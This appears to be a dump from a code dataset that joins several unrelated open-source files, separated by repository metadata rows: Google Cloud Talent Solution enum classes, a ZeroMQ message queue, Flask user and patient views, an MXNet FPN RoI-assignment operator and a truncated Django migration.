ADVANCED (int): Can perform the actions associated with this skill without assistance.
EXPERT (int): Known as an expert in this area.
"""
SKILL_PROFICIENCY_LEVEL_UNSPECIFIED = 0
UNSKILLED = 6
FUNDAMENTAL_AWARENESS = 1
NOVICE = 2
INTERMEDIATE = 3
ADVANCED = 4
EXPERT = 5
class Visibility(enum.IntEnum):
"""
Deprecated. All resources are only visible to the owner.
An enum that represents who has view access to the resource.
Attributes:
VISIBILITY_UNSPECIFIED (int): Default value.
ACCOUNT_ONLY (int): The resource is only visible to the GCP account who owns it.
SHARED_WITH_GOOGLE (int): The resource is visible to the owner and may be visible to other
applications and processes at Google.
SHARED_WITH_PUBLIC (int): The resource is visible to the owner and may be visible to all other API
clients.
"""
VISIBILITY_UNSPECIFIED = 0
ACCOUNT_ONLY = 1
SHARED_WITH_GOOGLE = 2
SHARED_WITH_PUBLIC = 3
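# Hedged usage sketch (not part of the generated module): these wrappers are
# plain enum.IntEnum classes, so members compare equal to the raw proto integers
# and can be recovered from wire values returned by the API.
def _example_enum_usage():
    level = JobLevel.MANAGER
    assert level == 3 and level.name == "MANAGER"
    return EmploymentType(1) is EmploymentType.FULL_TIME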
class Application(object):
class ApplicationStage(enum.IntEnum):
"""
The stage of the application.
Attributes:
APPLICATION_STAGE_UNSPECIFIED (int): Default value.
NEW (int): Candidate has applied or a recruiter put candidate into consideration but
candidate is not yet screened / no decision has been made to move or not
move the candidate to the next stage.
SCREEN (int): A recruiter decided to screen the candidate for this role.
HIRING_MANAGER_REVIEW (int): Candidate is being / was sent to the customer / hiring manager for
detailed review.
INTERVIEW (int): Candidate was approved by the client / hiring manager and is being / was
interviewed for the role.
OFFER_EXTENDED (int): Candidate will be / has been given an offer of employment.
OFFER_ACCEPTED (int): Candidate has accepted their offer of employment.
STARTED (int): Candidate has begun (or completed) their employment or assignment with
the employer.
"""
APPLICATION_STAGE_UNSPECIFIED = 0
NEW = 1
SCREEN = 2
HIRING_MANAGER_REVIEW = 3
INTERVIEW = 4
OFFER_EXTENDED = 5
OFFER_ACCEPTED = 6
STARTED = 7
class ApplicationState(enum.IntEnum):
"""
Enum that represents the application status.
Attributes:
APPLICATION_STATE_UNSPECIFIED (int): Default value.
IN_PROGRESS (int): The current stage is in progress or pending, for example, interviews in
progress.
CANDIDATE_WITHDREW (int): The current stage was terminated by a candidate decision.
EMPLOYER_WITHDREW (int): The current stage was terminated by an employer or agency decision.
COMPLETED (int): The current stage is successfully completed, but the next stage (if
applicable) has not begun.
CLOSED (int): The current stage was closed without an exception, or terminated for
reasons unrelated to the candidate.
"""
APPLICATION_STATE_UNSPECIFIED = 0
IN_PROGRESS = 1
CANDIDATE_WITHDREW = 2
EMPLOYER_WITHDREW = 3
COMPLETED = 4
CLOSED = 5
class BatchOperationMetadata(object):
class State(enum.IntEnum):
"""
Attributes:
STATE_UNSPECIFIED (int): Default value.
INITIALIZING (int): The batch operation is being prepared for processing.
PROCESSING (int): The batch operation is actively being processed.
SUCCEEDED (int): The batch operation is processed, and at least one item has been
successfully processed.
FAILED (int): The batch operation is done and no item has been successfully processed.
CANCELLING (int): The batch operation is in the process of cancelling after
``google.longrunning.Operations.CancelOperation`` is called.
CANCELLED (int): The batch operation is done after
``google.longrunning.Operations.CancelOperation`` is called. Any items
processed before cancelling are returned in the response.
"""
STATE_UNSPECIFIED = 0
INITIALIZING = 1
PROCESSING = 2
SUCCEEDED = 3
FAILED = 4
CANCELLING = 5
CANCELLED = 6
class CommuteFilter(object):
class RoadTraffic(enum.IntEnum):
"""
The traffic density to use when calculating commute time.
Attributes:
ROAD_TRAFFIC_UNSPECIFIED (int): Road traffic situation isn't specified.
TRAFFIC_FREE (int): Optimal commute time without considering any traffic impact.
BUSY_HOUR (int): Commute time calculation takes in account the peak traffic impact.
"""
ROAD_TRAFFIC_UNSPECIFIED = 0
TRAFFIC_FREE = 1
BUSY_HOUR = 2
class CompensationFilter(object):
class FilterType(enum.IntEnum):
"""
Specify the type of filtering.
Attributes:
FILTER_TYPE_UNSPECIFIED (int): Filter type unspecified. Position holder, INVALID, should never be used.
UNIT_ONLY (int): Filter by ``base compensation entry's`` unit. A job is a match if and
only if the job contains a base CompensationEntry and the base
CompensationEntry's unit matches provided ``units``. Populate one or
more ``units``.
See ``CompensationInfo.CompensationEntry`` for definition of base
compensation entry.
UNIT_AND_AMOUNT (int): Filter by ``base compensation entry's`` unit and amount / range. A job
is a match if and only if the job contains a base CompensationEntry, and
the base entry's unit matches provided ``CompensationUnit`` and amount
or range overlaps with provided ``CompensationRange``.
See ``CompensationInfo.CompensationEntry`` for definition of base
compensation entry.
Set exactly one ``units`` and populate ``range``.
ANNUALIZED_BASE_AMOUNT (int): Filter by annualized base compensation amount and
``base compensation entry's`` unit. Populate ``range`` and zero or more
``units``.
ANNUALIZED_TOTAL_AMOUNT (int): Filter by annualized total compensation amount and
``base compensation entry's`` unit . Populate ``range`` and zero or more
``units``.
"""
FILTER_TYPE_UNSPECIFIED = 0
UNIT_ONLY = 1
UNIT_AND_AMOUNT = 2
ANNUALIZED_BASE_AMOUNT = 3
ANNUALIZED_TOTAL_AMOUNT = 4
class CompensationInfo(object):
class CompensationType(enum.IntEnum):
"""
The type of compensation.
For compensation amounts specified in non-monetary amounts, describe the
compensation scheme in the ``CompensationEntry.description``.
For example, tipping format is described in
``CompensationEntry.description`` (for example, "expect 15-20% tips
based on customer bill.") and an estimate of the tips provided in
``CompensationEntry.amount`` or ``CompensationEntry.range`` ($10 per
hour).
For example, equity is described in ``CompensationEntry.description``
(for example, "1% - 2% equity vesting over 4 years, 1 year cliff") and
value estimated in ``CompensationEntry.amount`` or
``CompensationEntry.range``. If no value estimate is possible, units are
``CompensationUnit.COMPENSATION_UNIT_UNSPECIFIED`` and then further
clarified in ``CompensationEntry.description`` field.
Attributes:
COMPENSATION_TYPE_UNSPECIFIED (int): Default value.
BASE (int): Base compensation: Refers to the fixed amount of money paid to an
employee by an employer in return for work performed. Base compensation
does not include benefits, bonuses or any other potential compensation
from an employer.
BONUS (int): Bonus.
SIGNING_BONUS (int): Signing bonus.
EQUITY (int): Equity.
PROFIT_SHARING (int): Profit sharing.
COMMISSIONS (int): Commission.
TIPS (int): Tips.
OTHER_COMPENSATION_TYPE (int): Other compensation type.
"""
COMPENSATION_TYPE_UNSPECIFIED = 0
BASE = 1
BONUS = 2
SIGNING_BONUS = 3
EQUITY = 4
PROFIT_SHARING = 5
COMMISSIONS = 6
TIPS = 7
OTHER_COMPENSATION_TYPE = 8
class CompensationUnit(enum.IntEnum):
"""
Pay frequency.
Attributes:
COMPENSATION_UNIT_UNSPECIFIED (int): Default value.
HOURLY (int): Hourly.
DAILY (int): Daily.
WEEKLY (int): Weekly
MONTHLY (int): Monthly.
YEARLY (int): Yearly.
ONE_TIME (int): One time.
OTHER_COMPENSATION_UNIT (int): Other compensation units.
"""
COMPENSATION_UNIT_UNSPECIFIED = 0
HOURLY = 1
DAILY = 2
WEEKLY = 3
MONTHLY = 4
YEARLY = 5
ONE_TIME = 6
OTHER_COMPENSATION_UNIT = 7
class CompleteQueryRequest(object):
class CompletionScope(enum.IntEnum):
"""
Enum to specify the scope of completion.
Attributes:
COMPLETION_SCOPE_UNSPECIFIED (int): Default value.
TENANT (int): Suggestions are based only on the data provided by the client.
PUBLIC (int): Suggestions are based on all jobs data in the system that's visible to
the client.
"""
COMPLETION_SCOPE_UNSPECIFIED = 0
TENANT = 1
PUBLIC = 2
class CompletionType(enum.IntEnum):
"""
Enum to specify auto-completion topics.
Attributes:
COMPLETION_TYPE_UNSPECIFIED (int): Default value.
JOB_TITLE (int): Only suggest job titles.
COMPANY_NAME (int): Only suggest company names.
COMBINED (int): Suggest both job titles and company names.
"""
COMPLETION_TYPE_UNSPECIFIED = 0
JOB_TITLE = 1
COMPANY_NAME = 2
COMBINED = 3
class DeviceInfo(object):
class DeviceType(enum.IntEnum):
"""
An enumeration describing an API access portal and exposure mechanism.
Attributes:
DEVICE_TYPE_UNSPECIFIED (int): The device type isn't specified.
WEB (int): A desktop web browser, such as Chrome, Firefox, Safari, or Internet
Explorer.
MOBILE_WEB (int): A mobile device web browser, such as a phone or tablet with a Chrome
browser.
ANDROID (int): An Android device native application.
IOS (int): An iOS device native application.
BOT (int): A bot, as opposed to a device operated by human beings, such as a web
crawler.
OTHER (int): Other devices types.
"""
DEVICE_TYPE_UNSPECIFIED = 0
WEB = 1
MOBILE_WEB = 2
ANDROID = 3
IOS = 4
BOT = 5
OTHER = 6
class EmployerFilter(object):
class EmployerFilterMode(enum.IntEnum):
"""
Enum indicating which set of ``Profile.employment_records`` to search
against.
Attributes:
EMPLOYER_FILTER_MODE_UNSPECIFIED (int): Default value.
ALL_EMPLOYMENT_RECORDS (int): Apply to all employers in ``Profile.employment_records``.
CURRENT_EMPLOYMENT_RECORDS_ONLY (int): Apply only to current employer in ``Profile.employment_records``.
PAST_EMPLOYMENT_RECORDS_ONLY (int): Apply only to past (not current) employers in
``Profile.employment_records``.
"""
EMPLOYER_FILTER_MODE_UNSPECIFIED = 0
ALL_EMPLOYMENT_RECORDS = 1
CURRENT_EMPLOYMENT_RECORDS_ONLY = 2
PAST_EMPLOYMENT_RECORDS_ONLY = 3
class JobEvent(object):
class JobEventType(enum.IntEnum):
"""
An enumeration of an event attributed to the behavior of the end user,
such as a job seeker.
Attributes:
JOB_EVENT_TYPE_UNSPECIFIED (int): The event is unspecified by other provided values.
IMPRESSION (int): The job seeker or other entity interacting with the service has
had a job rendered in their view, such as in a list of search results in
a compressed or clipped format. This event is typically associated with
the viewing of a jobs list on a single page by a job seeker.
VIEW (int): The job seeker, or other entity interacting with the service, has viewed
the details of a job, including the full description. This event doesn't
apply to viewing a snippet of a job appearing as a part of the job
search results. Viewing a snippet is associated with an ``impression``).
VIEW_REDIRECT (int): The job seeker or other entity interacting with the service
performed an action to view a job and was redirected to a different
website for job.
APPLICATION_START (int): The job seeker or other entity interacting with the service
began the process or demonstrated the intention of applying for a job.
APPLICATION_FINISH (int): The job seeker or other entity interacting with the service
submitted an application for a job.
APPLICATION_QUICK_SUBMISSION (int): The job seeker or other entity interacting with the service submitted an
application for a job with a single click without entering information.
If a job seeker performs this action, send only this event to the
service. Do not also send ``JobEventType.APPLICATION_START`` or
``JobEventType.APPLICATION_FINISH`` events.
APPLICATION_REDIRECT (int): The job seeker or other entity interacting with the service
performed an action to apply to a job and was redirected to a different
website to complete the application.
APPLICATION_START_FROM_SEARCH (int): The job seeker or other entity interacting with the service began the
process or demonstrated the intention of applying for a job from the
search results page without viewing the details of the job posting.
If sending this event, JobEventType.VIEW event shouldn't be sent.
APPLICATION_REDIRECT_FROM_SEARCH (int): The job seeker, or other entity interacting with the service, performs
an action with a single click from the search results page to apply to a
job (without viewing the details of the job posting), and is redirected
to a different website to complete the application. If a candidate
performs this action, send only this event to the service. Do not also
send ``JobEventType.APPLICATION_START``,
``JobEventType.APPLICATION_FINISH`` or ``JobEventType.VIEW`` events.
APPLICATION_COMPANY_SUBMIT (int): This event should be used when a company submits an application
on behalf of a job seeker. This event is intended for use by staffing
agencies attempting to place candidates.
BOOKMARK (int): The job seeker or other entity interacting with the service demonstrated
an interest in a job by bookmarking or saving it.
NOTIFICATION (int): The job seeker or other entity interacting with the service was
sent a notification, such as an email alert or device notification,
containing one or more jobs listings generated by the service.
HIRED (int): The job seeker or other entity interacting with the service was
employed by the hiring entity (employer). Send this event
only if the job seeker was hired through an application that was
initiated by a search conducted through the Cloud Talent Solution
service.
SENT_CV (int): A recruiter or staffing agency submitted an application on behalf of the
candidate after interacting with the service to identify a suitable job
posting.
INTERVIEW_GRANTED (int): The entity interacting with the service (for example, the job seeker),
was granted an initial interview by the hiring entity (employer). This
event should only be sent if the job seeker was granted an interview as
            part of an application that was initiated by a search conducted through,
            or a recommendation provided by, the Cloud Talent Solution service.
"""
JOB_EVENT_TYPE_UNSPECIFIED = 0
IMPRESSION = 1
VIEW = 2
VIEW_REDIRECT = 3
APPLICATION_START = 4
APPLICATION_FINISH = 5
APPLICATION_QUICK_SUBMISSION = 6
APPLICATION_REDIRECT = 7
APPLICATION_START_FROM_SEARCH = 8
APPLICATION_REDIRECT_FROM_SEARCH = 9
APPLICATION_COMPANY_SUBMIT = 10
BOOKMARK = 11
NOTIFICATION = 12
HIRED = 13
SENT_CV = 14
INTERVIEW_GRANTED = 15
class Location(object):
class LocationType(enum.IntEnum):
"""
An enum which represents the type of a location.
Attributes:
LOCATION_TYPE_UNSPECIFIED (int): Default value if the type isn't specified.
COUNTRY (int): A country level location.
ADMINISTRATIVE_AREA (int): A state or equivalent level location.
SUB_ADMINISTRATIVE_AREA (int): A county or equivalent level location.
LOCALITY (int): A city or equivalent level location.
POSTAL_CODE (int): A postal code level location.
SUB_LOCALITY (int): A sublocality is a subdivision of a locality, for example a city borough,
ward, or arrondissement. Sublocalities are usually recognized by a local
political authority. For example, Manhattan and Brooklyn are recognized
as boroughs by the City of New York, and are therefore modeled as
sublocalities.
SUB_LOCALITY_1 (int): A district or equivalent level location.
          SUB_LOCALITY_2 (int): A smaller district or equivalent level location.
NEIGHBORHOOD (int): A neighborhood level location.
STREET_ADDRESS (int): A street address level location.
"""
LOCATION_TYPE_UNSPECIFIED = 0
COUNTRY = 1
ADMINISTRATIVE_AREA = 2
SUB_ADMINISTRATIVE_AREA = 3
LOCALITY = 4
POSTAL_CODE = 5
SUB_LOCALITY = 6
SUB_LOCALITY_1 = 7
SUB_LOCALITY_2 = 8
NEIGHBORHOOD = 9
STREET_ADDRESS = 10
class LocationFilter(object):
class TelecommutePreference(enum.IntEnum):
"""
Specify whether to include telecommute jobs.
Attributes:
TELECOMMUTE_PREFERENCE_UNSPECIFIED (int): Default value if the telecommute preference isn't specified.
TELECOMMUTE_EXCLUDED (int): Exclude telecommute jobs.
TELECOMMUTE_ALLOWED (int): Allow telecommute jobs.
"""
TELECOMMUTE_PREFERENCE_UNSPECIFIED = 0
TELECOMMUTE_EXCLUDED = 1
TELECOMMUTE_ALLOWED = 2
class Phone(object):
class PhoneType(enum.IntEnum):
"""
Enum that represents the type of the telephone.
Attributes:
PHONE_TYPE_UNSPECIFIED (int): Default value.
LANDLINE (int): A landline.
MOBILE (int): A mobile.
FAX (int): A fax.
PAGER (int): A pager.
          TTY_OR_TDD (int): A TTY (text telephone) or TDD (telecommunication device for the deaf).
VOICEMAIL (int): A voicemail.
VIRTUAL (int): A virtual telephone number is a number that can be routed to another
number and managed by the user via Web, SMS, IVR, and so on. It is
associated with a particular person, and may be routed to either a
MOBILE or LANDLINE number. The ``phone usage`` should be set to PERSONAL
for these phone types. Some more information can be found here:
            https://en.wikipedia.org/wiki/Personal_Numbers
VOIP (int): Voice over IP numbers. This includes TSoIP (Telephony Service over IP).
MOBILE_OR_LANDLINE (int): In some regions (e.g. the USA), it is impossible to distinguish between
fixed-line and mobile numbers by looking at the phone number itself.
"""
PHONE_TYPE_UNSPECIFIED = 0
LANDLINE = 1
MOBILE = 2
FAX = 3
PAGER = 4
TTY_OR_TDD = 5
VOICEMAIL = 6
VIRTUAL = 7
VOIP = 8
MOBILE_OR_LANDLINE = 9
class ProfileEvent(object):
class ProfileEventType(enum.IntEnum):
"""
The enum represents types of client events for a candidate profile.
Attributes:
PROFILE_EVENT_TYPE_UNSPECIFIED (int): Default value.
IMPRESSION (int): Send this event when a ``ProfileEvent.profiles`` was sent as a part of a
result set for a CTS API call and was rendered in the end user's UI
(that is, the ``ProfileEvent.recruiter``).
VIEW (int): The VIEW event records the action of a candidate's profile being viewed
by an end user. This is critical to tracking product metrics and should
be sent for every profile VIEW that happens in your system, whether the
event is associated with an API call (for example, a recruiter making a
request for a result set and clicking on a profile) or not (a recruiter
using the system to view profile details without making a request).
            For VIEW events associated with API calls, the
``ClientEvent.request_id`` should be populated. If the VIEW is not
associated with an API call, ``request_id`` should not be populated.
This event requires a valid recruiter and one valid ID in profiles.
BOOKMARK (int): The profile is bookmarked.
"""
PROFILE_EVENT_TYPE_UNSPECIFIED = 0
IMPRESSION = 1
VIEW = 2
BOOKMARK = 3
class Resume(object):
class ResumeType(enum.IntEnum):
"""
The format of a structured resume.
Attributes:
RESUME_TYPE_UNSPECIFIED (int): Default value.
HRXML (int): The profile contents in HR-XML format.
See https://schemas.liquid-technologies.com/hr-xml/2007-04-15/ for more
information about Human Resources XML.
OTHER_RESUME_TYPE (int): Resume type not specified.
"""
RESUME_TYPE_UNSPECIFIED = 0
HRXML = 1
OTHER_RESUME_TYPE = 2
class SearchJobsRequest(object):
class DiversificationLevel(enum.IntEnum):
"""
Controls whether highly similar jobs are returned next to each other in
the search results. Jobs are identified as highly similar based on
their titles, job categories, and locations. Highly similar results are
clustered so that only one representative job of the cluster is
displayed to the job seeker higher up in the results, with the other jobs
being displayed lower down in the results.
Attributes:
DIVERSIFICATION_LEVEL_UNSPECIFIED (int): The diversification level isn't specified.
DISABLED (int): Disables diversification. Jobs that would normally be pushed to the last
page would not have their positions altered. This may result in highly
similar jobs appearing in sequence in the search results.
SIMPLE (int): Default diversifying behavior. The result list is ordered so that
highly similar results are pushed to the end of the last page of search
results.
"""
DIVERSIFICATION_LEVEL_UNSPECIFIED = 0
DISABLED = 1
SIMPLE = 2
class SearchMode(enum.IntEnum):
"""
A string-represented enumeration of the job search mode. The service
        operates differently for different modes of service.
Attributes:
SEARCH_MODE_UNSPECIFIED (int): The mode of the search method isn't specified. The default search
            behavior is identical to ``JOB_SEARCH`` search behavior.
JOB_SEARCH (int): The job search matches against all jobs, and featured jobs
(jobs with promotionValue > 0) are not specially handled.
FEATURED_JOB_SEARCH (int): The job search matches only against featured jobs (jobs with a
promotionValue > 0). This method doesn't return any jobs having a
promotionValue <= 0. The search results order is determined by the
promotionValue (jobs with a higher promotionValue are returned higher up
in the search results), with relevance being used as a tiebreaker.
"""
SEARCH_MODE_UNSPECIFIED = 0
JOB_SEARCH = 1
FEATURED_JOB_SEARCH = 2
class CustomRankingInfo(object):
class ImportanceLevel(enum.IntEnum):
"""
The importance level for ``CustomRankingInfo.ranking_expression``.
Attributes:
IMPORTANCE_LEVEL_UNSPECIFIED (int): Default value if the importance level isn't specified.
NONE (int): The given ranking expression is of None importance, existing relevance
score (determined by API algorithm) dominates job's final ranking
position.
LOW (int): The given ranking expression is of Low importance in terms of job's
final ranking position compared to existing relevance
score (determined by API algorithm).
MILD (int): The given ranking expression is of Mild importance in terms of job's
final ranking position compared to existing relevance
score (determined by API algorithm).
MEDIUM (int): The given ranking expression is of Medium importance in terms of job's
final ranking position compared to existing relevance
score (determined by API algorithm).
HIGH (int): The given ranking expression is of High importance in terms of job's
final ranking position compared to existing relevance
score (determined by API algorithm).
EXTREME (int): The given ranking expression is of Extreme importance, and dominates
job's final ranking position with existing relevance
score (determined by API algorithm) ignored.
"""
IMPORTANCE_LEVEL_UNSPECIFIED = 0
NONE = 1
LOW = 2
MILD = 3
MEDIUM = 4
HIGH = 5
EXTREME = 6
class Tenant(object):
class DataUsageType(enum.IntEnum):
"""
Enum that represents how user data owned by the tenant is used.
Attributes:
DATA_USAGE_TYPE_UNSPECIFIED (int): Default value.
AGGREGATED (int): Data owned by this tenant is used to improve search/recommendation
quality across tenants.
ISOLATED (int): Data owned by this tenant is used to improve search/recommendation
quality for this tenant only.
"""
DATA_USAGE_TYPE_UNSPECIFIED = 0
AGGREGATED = 1
ISOLATED = 2
class TimeFilter(object):
class TimeField(enum.IntEnum):
"""
Time fields can be used in TimeFilter.
Attributes:
TIME_FIELD_UNSPECIFIED (int): Default value.
CREATE_TIME (int): Earliest profile create time.
UPDATE_TIME (int): Latest profile update time.
"""
TIME_FIELD_UNSPECIFIED = 0
CREATE_TIME = 1
UPDATE_TIME = 2
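# --- Editor's usage sketch (not part of the generated module) ---
# The wrapper classes above only namespace IntEnum members, so callers can
# compare members against plain integers or send int(member) on the wire.
# Everything below refers only to names defined in this file.
if __name__ == "__main__":
    assert JobEvent.JobEventType.VIEW == 2
    assert Location.LocationType.LOCALITY == 4
    preference = LocationFilter.TelecommutePreference.TELECOMMUTE_ALLOWED
    print("telecommute preference on the wire:", int(preference))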
| apache-2.0 | -5,653,163,422,906,155,000 | 41.673684 | 120 | 0.669812 | false |
JeremyOT/Toto | toto/messaging.py | 1 | 1817 | from threading import Thread
from traceback import format_exc
import zmq
import logging
class MessageQueue():
def __init__(self):
self.__handlers = {}
self.__zmq_context = zmq.Context()
self.__out_socket = self.__zmq_context.socket(zmq.PUSH)
self.__thread = None
self.__protocol = None
self.__port = 0
self.__interface = None
self.on_recv = None
@property
def port(self):
return self.__port
@property
def interface(self):
return self.__interface
@property
def protocol(self):
return self.__protocol
  @property
  def address(self):
    return '%s://%s:%s' % (self.__protocol, self.__interface, self.__port)
def connect_output(self, *addresses):
for address in addresses:
      self.__out_socket.connect(address)
def start_listening(self, on_recv=None, port=0, protocol='tcp', interface='*'):
if self.__thread:
return
if on_recv:
self.on_recv = on_recv
self.__protocol = protocol
self.__interface = interface
def listen():
context = zmq.Context()
socket = context.socket(zmq.PULL)
if port:
self.__port = port
socket.bind(self.address)
else:
        self.__port = socket.bind_to_random_port('%s://%s' % (protocol, interface))
while True:
try:
message = socket.recv()
if on_recv:
on_recv(message)
except Exception as e:
logging.error(format_exc())
self.__thread = None
self.__thread = Thread(target=listen)
self.__thread.daemon = True
self.__thread.start()
def send(self, message):
self.__out_socket.send(message)
_instances = {}
@classmethod
def instance(cls, name='MessageQueue'):
try:
return cls._instances[name]
except:
cls._instances[name] = cls()
return cls._instances[name]
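# --- Editor's usage sketch (illustration only; port and instance names are placeholders) ---
# One MessageQueue binds a PULL socket via start_listening(); another pushes to it
# after connect_output().  The short sleep only keeps the daemon listener alive briefly.
if __name__ == '__main__':
  import time
  def log_message(message):
    print(message)
  receiver = MessageQueue.instance('receiver')
  receiver.start_listening(on_recv=log_message, port=9010, interface='*')
  sender = MessageQueue.instance('sender')
  sender.connect_output('tcp://127.0.0.1:9010')
  sender.send(b'hello')
  time.sleep(1)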
| mit | -1,360,145,696,010,402,300 | 23.226667 | 81 | 0.605394 | false |
allspeak/api.allspeak.eu | web/project/user/views.py | 1 | 6116 | from flask import render_template, Blueprint, request, redirect, url_for, flash, abort, jsonify
from sqlalchemy.exc import IntegrityError
from flask_login import login_user, current_user, login_required, logout_user
from threading import Thread
from itsdangerous import URLSafeTimedSerializer
from datetime import datetime
import os
from .forms import LoginForm, EmailForm, PasswordForm, NewPatientForm
from project import db, app
from project.models import User
user_blueprint = Blueprint('user', __name__)
def can_operate_on(user_from, user_to):
return (user_from.role == User.ADMIN or
user_from.id == user_to.id or
user_to.role == User.PATIENT)
def flash_errors(form):
for field, errors in form.errors.items():
for error in errors:
flash(u"Error in the %s field - %s" % (
getattr(form, field).label.text,
error
), 'info')
################
#### routes ####
################
@user_blueprint.route('/', methods=['GET'])
@login_required
def index():
return redirect(current_user.get_homepage())
@user_blueprint.route('/login', methods=['GET', 'POST'])
def login():
form = LoginForm(request.form)
if request.method == 'POST':
if form.validate_on_submit():
user = User.query.filter_by(email=form.email.data).first()
if user is not None and user.is_correct_password(form.password.data):
user.authenticated = True
user.refresh_login()
db.session.add(user)
db.session.commit()
login_user(user)
flash('Thanks for logging in, {}'.format(current_user.email))
if user.role == User.ADMIN:
redirect_url = url_for('user.view_users')
else:
redirect_url = url_for('user.view_patients')
return redirect(redirect_url)
else:
flash('ERROR! Incorrect login credentials.', 'error')
return render_template('login.html', form=form)
@user_blueprint.route('/logout')
@login_required
def logout():
user = current_user
user.authenticated = False
db.session.add(user)
db.session.commit()
logout_user()
flash('Goodbye!', 'info')
return redirect(url_for('user.login'))
@user_blueprint.route('/<int:id>/user_profile')
@login_required
def user_profile(id):
user = User.query.filter(User.id == id).first()
if not can_operate_on(current_user, user):
abort(403)
return render_template('user_profile.html', user=user)
@user_blueprint.route('/<int:id>/email_change', methods=["GET", "POST"])
@login_required
def user_email_change(id):
user = User.query.filter(User.id == id).first()
if not can_operate_on(current_user, user):
abort(403)
form = EmailForm()
if request.method == 'POST':
if form.validate_on_submit():
try:
user_check = User.query.filter_by(email=form.email.data).first()
if user_check is None:
user.email = form.email.data
db.session.add(user)
db.session.commit()
return redirect(url_for('user.user_profile', id=user.id))
else:
flash('Sorry, that email already exists!', 'error')
except IntegrityError:
flash('Error! That email already exists!', 'error')
return render_template('email_change.html', form=form, user=user)
@user_blueprint.route('/<int:id>/password_change', methods=["GET", "POST"])
@login_required
def user_password_change(id):
user = User.query.filter(User.id == id).first()
if not can_operate_on(current_user, user):
abort(403)
form = PasswordForm()
if request.method == 'POST':
if form.validate_on_submit():
user.password = form.password.data
db.session.add(user)
db.session.commit()
flash('Password has been updated!', 'success')
return redirect(url_for('user.user_profile', id=user.id))
return render_template('password_change.html', form=form, user=user)
@user_blueprint.route('/view_patients')
@login_required
def view_patients():
if current_user.role == User.PATIENT:
abort(403)
else:
users = User.query.filter(
User.role == User.PATIENT).order_by(User.id).all()
return render_template('view_patients.html', users=users)
@user_blueprint.route('/view_users')
@login_required
def view_users():
if current_user.role != User.ADMIN:
abort(403)
else:
users = User.query.order_by(User.id).all()
return render_template('view_users.html', users=users)
@user_blueprint.route('/new_patient', methods=['GET', 'POST'])
def new_patient():
form = NewPatientForm(request.form)
if request.method == 'POST':
if form.validate_on_submit():
try:
new_user = User(role=User.PATIENT)
db.session.add(new_user)
db.session.commit()
flash('New patient added', 'success')
return redirect(url_for('user.user_profile', id=new_user.id))
except IntegrityError:
db.session.rollback()
flash('An error happened', 'error')
return render_template('new_patient.html', form=form)
@user_blueprint.route('/<int:id>/api_key_reset', methods=["GET", "POST"])
@login_required
def api_key_reset(id):
user = User.query.filter(User.id == id).first()
if not can_operate_on(current_user, user):
abort(403)
if request.method == 'POST':
try:
user.regenerate_api_key()
db.session.add(user)
db.session.commit()
flash('api key reset completed with success', 'success')
return redirect(url_for('user.user_profile', id=user.id))
except IntegrityError:
db.session.rollback()
flash('An error happened', 'error')
return render_template('api_key_reset.html', user=user)
| mit | -7,856,011,717,960,179,000 | 32.977778 | 95 | 0.600065 | false |
TuSimple/simpledet | models/FPN/assign_layer_fpn.py | 1 | 2616 | """
Assign Layer operator for FPN
author: Yi Jiang, Chenxia Han
"""
import mxnet as mx
import numpy as np
class AssignLayerFPNOperator(mx.operator.CustomOp):
def __init__(self, rcnn_stride, roi_canonical_scale, roi_canonical_level):
super().__init__()
self.rcnn_stride = rcnn_stride
self.roi_canonical_scale = roi_canonical_scale
self.roi_canonical_level = roi_canonical_level
def forward(self, is_train, req, in_data, out_data, aux):
all_rois = in_data[0]
rcnn_stride = self.rcnn_stride
scale0 = self.roi_canonical_scale
lvl0 = self.roi_canonical_level
k_min = np.log2(min(rcnn_stride))
k_max = np.log2(max(rcnn_stride))
rois_area = (all_rois[:, :, 2] - all_rois[:, :, 0] + 1) \
* (all_rois[:, :, 3] - all_rois[:, :, 1] + 1)
scale = mx.nd.sqrt(rois_area)
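        # Editor's note: the next lines implement the FPN level-assignment rule,
        # level = floor(lvl0 + log2(sqrt(roi_area) / scale0)), clamped to the
        # finest/coarsest strides configured for the RCNN head.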
target_lvls = mx.nd.floor(lvl0 + mx.nd.log2(scale / scale0 + 1e-6))
target_lvls = mx.nd.clip(target_lvls, k_min, k_max)
target_stride = (2 ** target_lvls).astype('uint8')
for i, s in enumerate(rcnn_stride):
lvl_rois = mx.nd.zeros_like(all_rois)
lvl_inds = mx.nd.expand_dims(target_stride == s, axis=2).astype('float32')
lvl_inds = mx.nd.broadcast_like(lvl_inds, lvl_rois)
lvl_rois = mx.nd.where(lvl_inds, all_rois, lvl_rois)
self.assign(out_data[i], req[i], lvl_rois)
def backward(self, req, out_grad, in_data, out_data, in_grad, aux):
self.assign(in_grad[0], req[0], 0)
@mx.operator.register('assign_layer_fpn')
class AssignLayerFPNProp(mx.operator.CustomOpProp):
def __init__(self, rcnn_stride, roi_canonical_scale, roi_canonical_level):
super().__init__(need_top_grad=False)
self.rcnn_stride = eval(rcnn_stride)
self.roi_canonical_scale = int(roi_canonical_scale)
self.roi_canonical_level = int(roi_canonical_level)
def list_arguments(self):
return ['rois']
def list_outputs(self):
rois_list = ['rois_s{}'.format(s) for s in self.rcnn_stride]
return rois_list
def infer_shape(self, in_shape):
rpn_rois_shape = in_shape[0]
output_rois_shape = [rpn_rois_shape] * len(self.rcnn_stride)
return [rpn_rois_shape], output_rois_shape
def create_operator(self, ctx, shapes, dtypes):
return AssignLayerFPNOperator(self.rcnn_stride, self.roi_canonical_scale,
self.roi_canonical_level)
def declare_backward_dependency(self, out_grad, in_data, out_data):
return []
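# --- Editor's usage sketch (illustration only; shapes and values are assumptions) ---
# The name registered above is what mx.sym.Custom looks up; the constructor
# arguments travel as strings and are parsed in AssignLayerFPNProp.__init__.
if __name__ == "__main__":
    rois = mx.sym.Variable("rois")  # assumed shape: (batch, num_rois, 4)
    rois_per_level = mx.sym.Custom(
        rois,
        op_type="assign_layer_fpn",
        rcnn_stride="(4, 8, 16, 32)",
        roi_canonical_scale="224",
        roi_canonical_level="4")
    print(rois_per_level.list_outputs())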
| apache-2.0 | 4,098,218,341,457,388,000 | 34.835616 | 86 | 0.606651 | false |
NullRecursive/WebLanches | loja/migrations/0010_auto_20161119_2248.py | 1 | 1216 | # -*- coding: utf-8 -*-
from __future__ import unicode_literals
from django.db import migrations, models
class Migration(migrations.Migration):
dependencies = [
('loja', '0009_auto_20161117_2110'),
]
operations = [
migrations.CreateModel(
name='Item',
fields=[
('id', models.AutoField(verbose_name='ID', serialize=False, auto_created=True, primary_key=True)),
('quantidade', models.IntegerField(default=0)),
],
),
migrations.CreateModel(
name='Pedido',
fields=[
